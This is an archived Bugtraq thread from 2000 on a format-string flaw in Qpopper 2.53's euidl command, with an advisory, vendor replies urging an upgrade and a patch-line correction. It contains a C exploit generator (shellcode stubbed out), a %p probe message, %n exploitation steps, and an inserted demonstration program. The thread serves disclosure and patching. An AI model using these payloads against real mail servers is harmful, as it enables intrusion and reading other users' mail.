5127666 2000-05-24  18:37  /220 lines/ Postmaster
Recipient: Bugtraq (import) <10961>
Subject: Qpopper 2.53 remote problem
------------------------------------------------------------
             user can gain gid=mail
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Authentication-Warning: Rage.Resentment.org: rawww set sender to
                        prizm@Resentment.org using -f
MIME-Version: 1.0
User-Agent: IMHO/0.97.1 (Webmail for Roxen)
Content-Type: multipart/mixed;boundary="'ThIs-RaNdOm-StRiNg-/=_.441580320:"
Content-Transfer-Encoding: 8bit
Message-ID:  <200005231643.JAA16829@Rage.Resentment.org>
Date:         Tue, 23 May 2000 09:43:33 -800
Reply-To: Prizm <prizm@RESENTMENT.ORG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Prizm <prizm@RESENTMENT.ORG>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

I have attached to this message the advisory with full details +
exploit on this problem.

Prizm/b0f,

Content-Disposition: attachment;filename=b0f5-Qpopper.txt

	_____________________________________________________________________
	  b u f f e r 0 v e r f l 0 w   s e c u r i t y   a d v i s o r y   # 5


		    Advisory Name: Remote shell via Qpopper2.53
		             Date: 5/23/00
		      Application: Qpopper 2.53 for *NIX
		           Vendor: Qualcomm Incorporated
		              WWW: www.qualcomm.com
		         Severity: can give users remote
		                   shell with gid=mail.
		           Author: prizm (prizm@resentment.org)
		         Homepage: b0f.freebsd.lublin.pl


 * Overview
	Qpopper is the most widely-used server for the POP3 protocol. This allows users to
	access their mail using any POP3 client.  Qpopper supports the latest standards,
	and includes a large number of optional features.  Qpopper is normally used with
	standard UNIX mail transfer and delivery agents such as sendmail or smail.



 * The Problem
	Yes, Qpop, again and again...
	There is a bug in version 2.53 of Qpop that can give you a remote
	shell with gid=mail. The problem is with the euidl command, which uses user
	input as the format string for the pop_msg() function.
	Let's examine the following code from the Qpop 2.53 source:
	--> pop_uidl.c, around line 150:
	 ................
	        sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
	        if (nl = index(buffer, NEWLINE)) *nl = 0;
	        sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
	 !      return (pop_msg (p,POP_SUCCESS, buffer));
                                      ^^^^^^^^^^^^^
	 .................
	Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat,
	const char *format,...), and here we have user input as the format string. Lame.
	Ok, back to the problem, imagine the following SMTP session:

	     MAIL FROM:<hakker@evil.org>
	     200 Ok
	     RCPT TO:<luser@host.withqpop253.com>
	     200 Ok
	     data
	     200 Okey, okey. end with "."
	     Subject: still trust qpop?=/
	     X-UIDL: AAAAAAAAAAAAAAAA
	     From: %p%p%p%p%p%p%p

	     test
	     .
	     200 BLABLABLA Ok, message accepted for delivery.

	  Then, luser connects with his pop account and runs the euidl command there:
		+OK QPOP (version 2.53) at b0f starting. <666.666@b0f>
		USER luser
		+OK Password required for luser.
		PASS secret
		+OK luser has 3 messages (1644 octets).
		euidl 3
		+OK 2 AAAAAAAAAAAAAAAA 530
0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028

	  Yeah, that's from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p
	  were interpreted as arguments for the vsnprintf() call.

 * Exploiting
	 Is this possible? Yeah, sure!
	 But there are some limits. Qpopper 2.53 from FreeBSD ports with patches is
	 much more difficult to exploit than the one from Linux. That is because the FreeBSD
	 patches change the vsprintf() call in pop_msg.c to a vsnprintf() call, and there is a
	 big difference between them. Qpopper with FreeBSD's patches IS exploitable.

       Exploit
       -------
/*  qpop_euidl.c exploit by prizm/Buffer0verflow Security
 *
 *  Sample exploit for buffer overflow in Qpopper 2.53.
 *  This little proggie generates a mail u need to send.
 *
 *  Standard disclaimer applies.
 *  By the way, exploit is broken =) You need to insert shellcode.
 *
 *  MAD greets to tf8 for pointing out the bug, and all other b0f members.
 *  greets to USSRLabs and ADM
 *  check http://b0f.freebsd.lublin.pl/ for news.
 */
#include <stdio.h>
#include <stdlib.h>	/* exit() */
#include <string.h>

char shellcode[]="imnothing";	/* placeholder; the author left this deliberately broken */
int main(int argc, char *argv[])
{
	int i;
	unsigned long ra=0;
	if(argc!=2) {
		fprintf(stderr,"Usage: %s return_addr\n", argv[0]);
		exit(0);
	}
	sscanf(argv[1], "%lx", &ra);	/* %lx: ra is an unsigned long */
	if(!ra)
		return 1;
	if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
		fprintf(stderr,"Bad shellcode\n");
		exit(0);
	}
	fprintf(stderr,"return address: 0x%.8lx\n", ra);
	/* the generated message is written to stdout, headers first */
	printf("X-UIDL: ");
	for(i=0; i < sizeof(shellcode);i++)
		printf("%c", shellcode[i]);
	printf("\r\n");
	printf("From: %s", "%.1000d");
	for(i=0; i < 50; i++)
		printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24);
	printf("@test\r\n");
	printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
	return 0;
}

	Exploiting QPOP from FreeBSD ports
	----------------------------------

	It is NOT easy, because vsprintf() is replaced with
	vsnprintf() so we can't overflow the stack, but we still have
	control over it (remember %n?).  I'm not going to post an exploit
	for this because it is really generic, but I will explain the
	theory of exploiting qpop with vsNprintf.  There is a little
	trick with %n you should know. Try to understand why the
	following code succeeds and prints out 2000, not sizeof(b):
---<cut>---
#include <stdio.h>
int main(void){
        int s=1; char b[1024]; int q;
        snprintf(b, sizeof(b), "%.2000d%n", 1, &q);
        return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES"));
}
---</cut>---
	On my box with FreeBSD 3.4 I have:
	2000, overflowed? NO

	Hah, the first time I expected to see 1024, but you know that all is
	unpredictable. So, this little thing will help us a lot.
	Exploiting it:
	a) Find where on the stack the user input is located.
	b) Compose a message with the fields X-UIDL and From:
		X-UIDL: ppRETARETARETARETA
		From: <SHELLCODE>%.RETURNd%n@test
	where:
	"pp"		is for padding (two or three chars)
	"RETA"		is the return address pointing to SHELLCODE
	"SHELLCODE"	guess
	"RETURN"	return address

	c) Exploit? If you need an exploit that will work on FreeBSD,
	code it yourself.



 * Vulnerable Versions
	2.53(Others?)


 * Fix
	You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which
	is not vulnerable to this problem.

	Or you can manually patch it by doing the following:

	  At lines 150 and 62 from pop_msg.c, replace:
	- return (pop_msg (p,POP_SUCCESS, buffer));
	  to:
	+ return (pop_msg (p,POP_SUCCESS, "%s", buffer));



			

					 copyright © 1999-2000
				    prizm, buffer0verfl0w security
					 b0f.freebsd.lublin.pl


(5127666) ------------------------------------------(Reflowed)
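
The two mechanisms the advisory above relies on, rebuilt as an added example for this archive (this is not the advisory's code nor Qpopper's): a stand-in for pop_msg() that is handed the euidl reply text as its format string versus the "%s" fix from the advisory's Fix section, a check a defender can run over header values to spot conversion directives, and the snprintf()/%n counting behaviour from the FreeBSD section. All demo_* names, the reply layout and the sample From: header are constructed assumptions; the sample uses "%%" so that both the vulnerable and the fixed path stay within defined behaviour while still showing that the text is being interpreted as a format.

```c
/* Added example, not code from the advisory or from Qpopper.  It rebuilds
 * the two points the advisory makes in a self-contained form: (1) what it
 * means for pop_msg() to receive user text as its format string, and what
 * the "%s" fix changes; (2) why snprintf() with %n reports 2000, not the
 * buffer size.  Every demo_* name is hypothetical. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define REPLY_SIZE 512

/* Stand-in for Qpopper's pop_msg(): formats one reply line into a fixed
 * buffer, like the vsnprintf() variant the FreeBSD patches introduce. */
static int demo_pop_msg(char *reply, size_t reply_size, const char *format, ...)
{
    va_list ap;
    int n;

    va_start(ap, format);
    n = vsnprintf(reply, reply_size, format, ap);
    va_end(ap);
    return n;
}

/* Builds the euidl reply body the way pop_uidl.c does: message number,
 * UIDL, length and the (sender-controlled) From: header, in a static buffer. */
static const char *demo_build_euidl_text(const char *from_hdr)
{
    static char buffer[REPLY_SIZE];
    snprintf(buffer, sizeof buffer, "%d %s %d %.128s",
             2, "AAAAAAAAAAAAAAAA", 530, from_hdr);
    return buffer;
}

/* Vulnerable shape (pre-fix pop_uidl.c): the assembled text IS the format. */
const char *demo_euidl_reply_vulnerable(const char *from_hdr)
{
    static char reply[REPLY_SIZE];
    demo_pop_msg(reply, sizeof reply, demo_build_euidl_text(from_hdr));
    return reply;
}

/* Fixed shape: the format is a literal and the text is an argument. */
const char *demo_euidl_reply_fixed(const char *from_hdr)
{
    static char reply[REPLY_SIZE];
    demo_pop_msg(reply, sizeof reply, "%s", demo_build_euidl_text(from_hdr));
    return reply;
}

/* Defender's check for mail headers or POP logs: a '%' that is not part of
 * a literal "%%" is a conversion directive the unpatched server would act on. */
int demo_header_has_directive(const char *value)
{
    const char *p = value;
    while ((p = strchr(p, '%')) != NULL) {
        if (p[1] == '%') { p += 2; continue; }   /* escaped percent sign */
        return 1;
    }
    return 0;
}

/* snprintf() with "%.<precision>d%n": the count stored by %n (and the
 * return value) is the length of the full conversion, not what fit in b. */
static int demo_trunc(int precision, size_t *stored)
{
    char b[1024];
    int q = 0;
    snprintf(b, sizeof b, "%.*d%n", precision, 1, &q);
    *stored = strlen(b);          /* at most sizeof b - 1 */
    return q;
}
int demo_snprintf_count(int precision)  { size_t s; return demo_trunc(precision, &s); }
int demo_snprintf_stored(int precision) { size_t s; demo_trunc(precision, &s); return (int)s; }

int main(void)
{
    /* Constructed From: header; "%%" is defined behaviour on both paths. */
    const char *from = "100%% legit <user@example.invalid>";
    printf("vulnerable: %s\n", demo_euidl_reply_vulnerable(from));
    printf("fixed:      %s\n", demo_euidl_reply_fixed(from));
    printf("probe flagged: %d\n", demo_header_has_directive("%p%p%p%p%p%p%p"));
    printf("%%n count: %d, bytes stored: %d\n",
           demo_snprintf_count(2000), demo_snprintf_stored(2000));
    return 0;
}
```

On the vulnerable path the "%%" in the From: header collapses to a single "%" in the POP reply, which is exactly the symptom the advisory's %p%p%p session shows; on the fixed path the header is echoed byte for byte. The snprintf() part shows why a vsnprintf() build is not automatically safe: the buffer is bounded, but %n still reports 2000, so the value written through %n is under the sender's control even though only 1023 bytes were stored.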

5128312 2000-05-24  22:00  /253 lines/ Postmaster
Recipient: Bugtraq (import) <10978>
Subject: Security Vulnerability in Qpopper 2.53 (Upgrade to 3.0.2)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1" ; format="flowed"
Message-ID:  <p04320305b5511470392c@[192.168.1.5]>
Date:         Tue, 23 May 2000 22:45:30 -0700
Reply-To: Qpopper Support <qpopper@QUALCOMM.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Qpopper Support <qpopper@QUALCOMM.COM>
X-To:         cert@cert.org, BUGTRAQ@securityfocus.com
X-cc:         Prizm <prizm@resentment.org>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by samantha.lysator.liu.se id VAA28407

Qpopper development has learned of a security vulnerability in
Qpopper 2.53 (and older).  All users of Qpopper are urged to upgrade
to 3.0.2 or later.

The exploit (details below) involves sending a specially-constructed
message to a user, then logging in as that user and issuing the EUIDL
command.  A successful attack can yield a shell running with group
'mail'.

It is important to note that the attack:

    1.  Requires the ability to log in as a user.
    2.  Can at most give a shell with the uid of the user and gid of mail,
        potentially allowing access to other users' mail.
    3.  Will be logged.
    4.  Requires Qpopper 2.53 or older.  The current released version is 3.0.2.

In addition, not all sites use group 'mail' or have Qpopper set to
run with gid=mail, or have spools owned by group 'mail' and have rw
group access.  However, this is a very common configuration.

Qpopper 3.0 has additional protections against buffer overflows; this
exploit proves the usefulness of this approach.  While the report
says "Qpop, again and again", implying this is a recurring problem in
Qpopper, in fact there is no problem in current released versions;
only older versions are vulnerable.



Following verbatim is the report we received from
prizm@resentment.org of the vulnerability (note that it says Qpopper
3.1 is OK; Qpopper 3.0 is also OK, due to the extra precautions in
that codebase):


[Advisory text identical to the attachment b0f5-Qpopper.txt in message 5127666 above.]

(5128312) ------------------------------------------

5129341 2000-05-25  08:43  /35 lines/ Postmaster
Recipient: Bugtraq (import) <10984>
Subject: Re: Qpopper 2.53 remote problem
------------------------------------------------------------
             user can gain gid=mail
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.LNX.4.05.10005241300410.5839-100000@biocserver.BIOC.CWRU.Edu>
Date:         Wed, 24 May 2000 13:02:52 -0400
Reply-To: Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
X-To:         Prizm <prizm@RESENTMENT.ORG>
X-cc:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <200005231643.JAA16829@Rage.Resentment.org>

while investigating the qpopper 2.53 source lying around to see about
this fix, i noticed they note the source patches mentioned are
incorrect. they note:

[quote]
          At lines 150 and 62 from pop_msg.c, replace:
        - return (pop_msg (p,POP_SUCCESS, buffer));
          to:
        + return (pop_msg (p,POP_SUCCESS, "%s", buffer));
[end quote]

when in fact it's lines 62 and 152 in the source file pop_uidl.c that
contain these lines (god bless grep).

just a minor correction... damn, i gotta start looking for a better
pop3d!

jose nazario					jose@biochemistry.cwru.edu
PGP fingerprint: 89 B0 81 DA 5B FD 7E 00  99 C3 B2 CD 48 A0 07 80
Public key available at http://biocserver.cwru.edu/~jose/pgp-key.asc
(5129341) ------------------------------------------(Reflowed)

5129508 2000-05-25  09:34  /20 lines/ Postmaster
Recipient: Bugtraq (import) <10986>
Subject: Re: Qpopper 2.53 remote problem
------------------------------------------------------------
             user can gain gid=mail
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Message-ID:  <p0432030cb551d13492c5@[192.168.1.5]>
Date:         Wed, 24 May 2000 11:35:50 -0700
Reply-To: Qpopper Support <qpopper@QUALCOMM.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Qpopper Support <qpopper@QUALCOMM.COM>
X-To:         Prizm <prizm@resentment.org>, BUGTRAQ@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <200005231643.JAA16829@Rage.Resentment.org>

This problem does not exist in Qpopper 3.0.2, which is the current
released version.  Anyone using an older version of Qpopper is urged
to upgrade to 3.0.2 or later (3.1 is in beta and is available as
well).
(5129508) ------------------------------------------